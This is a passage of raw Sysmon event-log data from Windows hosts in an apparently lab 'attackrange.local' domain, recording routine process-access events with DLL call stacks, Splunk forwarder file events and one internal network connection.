l+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x80000000000000001046274Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:02.072{466BC892-32D3-60E8-770B-00000000CF01}63567232C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba2b0|C:\Windows\System32\TwinUI.dll+ba627|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x80000000000000001046273Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:02.057{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+12141|C:\Windows\SYSTEM32\psmserviceexthost.dll+170e8|C:\Windows\SYSTEM32\resourcepolicyserver.dll+12326|C:\Windows\SYSTEM32\resourcepolicyserver.dll+bac5|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046272Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:02.057{466BC892-32D3-60E8-770B-00000000CF01}63568252C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109146|C:\Windows\System32\TwinUI.dll+82a97|C:\Windows\System32\TwinUI.dll+beade|C:\Windows\System32\TwinUI.dll+beaa9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046271Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:02.057{466BC892-32D3-60E8-770B-00000000CF01}63568252C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109146|C:\Windows\System32\TwinUI.dll+82a97|C:\Windows\System32\TwinUI.dll+beade|C:\Windows\System32\TwinUI.dll+beaa9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046270Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:02.057{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+12141|C:\Windows\SYSTEM32\psmserviceexthost.dll+170e8|C:\Windows\SYSTEM32\resourcepolicyserver.dll+12326|C:\Windows\SYSTEM32\resourcepolicyserver.dll+bac5|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046269Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:02.057{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+12141|C:\Windows\SYSTEM32\psmserviceexthost.dll+170e8|C:\Windows\SYSTEM32\resourcepolicyserver.dll+12326|C:\Windows\SYSTEM32\resourcepolicyserver.dll+bac5|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046268Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:02.057{466BC892-32D3-60E8-770B-00000000CF01}63569904C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+62945|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046267Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:02.057{466BC892-32D3-60E8-770B-00000000CF01}63569904C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046266Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:02.057{466BC892-32D3-60E8-770B-00000000CF01}63569904C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046265Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:02.054{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+622c0|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046264Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:02.054{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47c90|C:\Windows\System32\SHELL32.dll+6227c|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046263Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:02.054{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62250|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046262Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:02.054{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d2c9|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000806220Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:03.972{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=208A288F3CCD46DC2F8EA9815E4A3889,SHA256=DCD273E3DDD33EC1A3D72CB72052B21CEEB9AA089AEAA54A8718CB4AD255FAF1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046354Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:03.953{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CC82FC1B3C1FA12D32A42E117E6F6ADF,SHA256=18038DE0A0D5A962C79837110964E279CC364352CDAE1BA152C0AE3A400141BA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001046353Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:03.819{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046352Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:03.819{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046351Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:03.819{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046350Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:03.819{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046349Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:03.819{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046348Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:03.819{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046347Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:03.819{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046346Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:03.819{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x8000000000000000806219Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:01.308{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57165-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 10341000x80000000000000001046345Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:03.819{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046344Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:03.819{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046343Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:03.819{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046342Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:03.819{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046341Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:03.819{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046340Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:03.819{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046339Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 